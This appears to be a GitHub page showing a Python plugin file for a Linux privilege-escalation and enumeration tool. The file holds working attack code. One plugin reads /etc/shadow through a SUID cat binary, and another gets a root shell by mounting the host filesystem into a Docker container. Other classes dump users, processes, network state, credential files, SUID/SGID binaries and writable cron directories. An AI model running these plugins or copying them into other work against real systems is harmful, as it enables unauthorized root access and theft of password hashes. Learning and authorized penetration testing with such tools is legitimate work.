Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
OMARLEAP/src/omar_plugins.py
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
265 lines (221 sloc)
8.53 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from plugins import PrivEsc, Enumeration | |
from os import popen | |
import os, tempfile | |
from subprocess import Popen, PIPE | |
import pty | |
import subprocess | |
import pathlib, stat | |
# A very basic method, but useful | |
def shellRun(command): | |
""" Put given commands into a temporary file, spawn a shell and explain how to use the command """ | |
f = tempfile.NamedTemporaryFile(delete=False) | |
fname=f.name | |
f.write(command.encode()) | |
f.close() | |
os.system(f"chmod u+x {fname}") | |
print(f"Execute command with '{fname}'...\nCtrl-D to leave shell") | |
#pty.spawn("/bin/bash") | |
#os.system(fname) | |
#os.unlink(fname) | |
"""An example plugin that tries to use `sudo su` to get root. | |
Requires being given the password for the current user and relies | |
on the current user having sudo privs, so while technically it | |
escalates proveleges, it does so only if you already have the | |
right credentials | |
""" | |
#shellRun("sudo passwd") | |
#shellRun("sudo id") | |
#shellRun("sudo -l") | |
def GrabOutput(command): | |
sp=subprocess.run(command, stdout=subprocess.PIPE) | |
return sp.stdout.decode() | |
def CheckBinary(p): | |
pl=pathlib.Path(p) | |
exists=pl.exists() | |
suid = False | |
if exists: | |
suid=(pl.stat().st_mode & stat.S_ISUID)!=0 | |
return (exists, suid) | |
class linCatEscalator(PrivEsc): | |
def __init__(self): | |
self.name="CatEscalator" | |
self.author="Omar Alhendi" | |
self.description="Showing Restricted file /etc/shadow using misonfigured cat" | |
self.version="" | |
def execute(self): | |
catPath= "/bin/cat" | |
exists, suid = CheckBinary(catPath) | |
if not exists: | |
print(f"{catPath} doesn't exist") | |
return | |
if not suid: | |
print(f"cat doesn't have SUID bit set on") | |
return | |
out = GrabOutput([catPath, "/etc/shadow"]) | |
print(out) | |
class HostInfo(Enumeration): | |
def __init__(self): | |
Enumeration.__init__(self) | |
self.name="Host Information" | |
self.author="Omar ALhendi" | |
self.description="Provides basic inforamdtion about the host" | |
self.version = "2.0" | |
def execute(self): | |
os.system("hostname") | |
os.system("whoami") | |
print(" Confidential And Users") | |
os.system("id") | |
os.system("who") | |
os.system("w") | |
os.system("last") | |
os.system("cat /etc/passwd | cut -d: -f1") | |
os.system("ps aux") | |
os.system("ps -ef") | |
print() | |
print(" Kernel Version") | |
os.system("uname -a") | |
os.system("uname -mrs") | |
os.system("rpm -q kernel") | |
os.system("dmesg | grep Linux") | |
os.system("ls /boot | grep vmlinuz-") | |
print() | |
print(" Environmental Variables") | |
os.system("cat /etc/profile") | |
os.system("cat /etc/bashrc") | |
os.system("cat ~/.bash_profile") | |
os.system("cat ~/.bashrc") | |
os.system("cat ~/.bash_logout") | |
os.system("env") | |
os.system("set") | |
print() | |
print(" Sensitive Information") | |
os.system("cat /etc/passwd") | |
os.system("cat /etc/group") | |
print() | |
print(" Files Privilegs") | |
os.system("ls -la") | |
class NetInfo(Enumeration): | |
def __init__(self): | |
Enumeration.__init__(self) | |
self.name="Network Information" | |
self.author="Omar ALhendi" | |
self.description="Provides basic inforamtion about the network" | |
self.version= "2.0" | |
def execute(self): | |
print() | |
os.system("ip") | |
os.system("ifconfig") | |
os.system("netstat -p") | |
os.system("route") | |
os.system("lsof -i") | |
os.system("lsof -i :80") | |
os.system("grep 80 /etc/services") | |
os.system("netstat -antup") | |
os.system("netstat -antpx") | |
os.system("netstat -tulpn") | |
os.system("chkconfig --list") | |
os.system("chkconfig --list | grep 3:on") | |
os.system("last") | |
os.system("w") | |
os.system("cat /etc/resolv.conf") | |
os.system("cat /etc/sysconfig/network") | |
os.system("cat /etc/networks") | |
os.system("iptables -L") | |
print() | |
print("Other Hosts and Computers Communicating") | |
os.system("netstat -antup") | |
os.system("netstat -antpx") | |
os.system("netstat -tulpn") | |
os.system("chkconfig --list") | |
class AppInfo(Enumeration): | |
def __init__(self): | |
Enumeration.__init__(self) | |
self.name="Applications and Services" | |
self.author="Omar ALhendi" | |
self.description="Provides Information about The Applications And Services" | |
def execute(self): | |
print() | |
print("Current Services Running") | |
os.system("ps aux") | |
os.system("ps -ef") | |
#os.system("top") | |
os.system("cat /etc/services") | |
print() | |
print("By Root") | |
os.system("ps aux | grep root") | |
os.system("ps -ef | grep root") | |
print() | |
print("Application Installed and Running") | |
os.system("dpkg -l") | |
os.system("rpm -qa") | |
os.system("ls -alh /var/cache/apt/archivesO") | |
os.system("ls -alh /var/cache/yum/") | |
lineBreak = "--------------------------------------" # Visual seperation | |
results = [] | |
"""Find cron info. Ben Roxbee Cox""" | |
linSensitiveFiles = {"GROUP": {"cmd": "cat /etc/group", "msg": "Can You Read The Groups File?", "results": results}, | |
"SHADOW": {"cmd": "cat /etc/shadow", "msg": "Can You Read The Shadow File?", "results": results}, | |
"MAIL": {"cmd": "ls -alh /var/mail/", "msg": "Any Mail?", "results": results}, | |
"ROOTDIR": {"cmd": "ls -al /root/", "msg": "Can you read the root directory?", "results": results}, | |
"HOMEDIR": {"cmd": "ls -al /home/", "msg": "Any interesting files in the home directory?", "results": results}, | |
"SGID": {"cmd": "find / -perm -g=s -type f 2>/dev/null", "msg": "Any useful SGID Files?"}, | |
"SUID": {"cmd": "find / -perm -u=s -type f 2>/dev/null", "msg": "Any useful SUID Files?", "results": results}, | |
"WRLDWX": {"cmd": "find / \( -perm -o w -perm -o x \) -type d 2>/dev/null", "msg": "World Writable & Executable Files", "results": results} | |
} | |
def findResults(eCommands): | |
"""Each item will pass through this function for subprocessing Ben's command dictionary | |
args: | |
eCommands : Dictionary containing commands to be progecessed. | |
returns: | |
eCommands : Dictionary with outputs populated. | |
""" | |
for command in eCommands: | |
cmd = eCommands[command]["cmd"] | |
output, error = subprocess.Popen([cmd], stdout=subprocess.PIPE, | |
stderr=subprocess.PIPE, | |
shell=True).communicate() | |
results = output.split(b"/") | |
eCommands[command]["results"] = results | |
return eCommands | |
def showResults(output): | |
"""Print results found to the terminal. | |
args: | |
output : Dictionary of commands and outputs to be printed. Prints results of Ben's found enums | |
""" | |
for item in output: | |
msg = output[item]["msg"] | |
results = output[item]["results"] | |
print("\n\n" +"[+] " + msg + "\n" + lineBreak) | |
for result in results: | |
if result.strip() != "": | |
print(result.decode("utf") + " ", end="") | |
print("\n") | |
return | |
class linCronInfo(Enumeration): | |
def __init__(self): | |
Enumeration.__init__(self) | |
self.name="Cron Jobs" | |
self.author="Ben Roxbee Cox" | |
self.description="List running Cron jobs" | |
return | |
def execute(self): | |
linCronInfo = {"CRON": {"cmd": "ls -p -la /etc/cron* 2>/dev/null", | |
"msg": "Scheduled cron jobs", "results": results}, | |
"CRONW": {"cmd": "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", | |
"msg": "Writable cron dirs", "results": results} | |
} | |
enumPer = linCronInfo | |
enumPerameter = findResults(enumPer) | |
showResults(enumPerameter) | |
return | |
class docker(PrivEsc): | |
def __init__(self): | |
self.name="Exploit Docker" | |
self.author="Ben Roxbee Cox" | |
self.description="Exploits a known vulnerability if a user is in the Docker group" | |
self.version="" | |
return | |
def execute(self): | |
id = popen("id").read() # Get user groups | |
if "docker" in id: os.system("docker run -it -v /:/mnt alpine chroot /mnt") # priv esc | |
return() |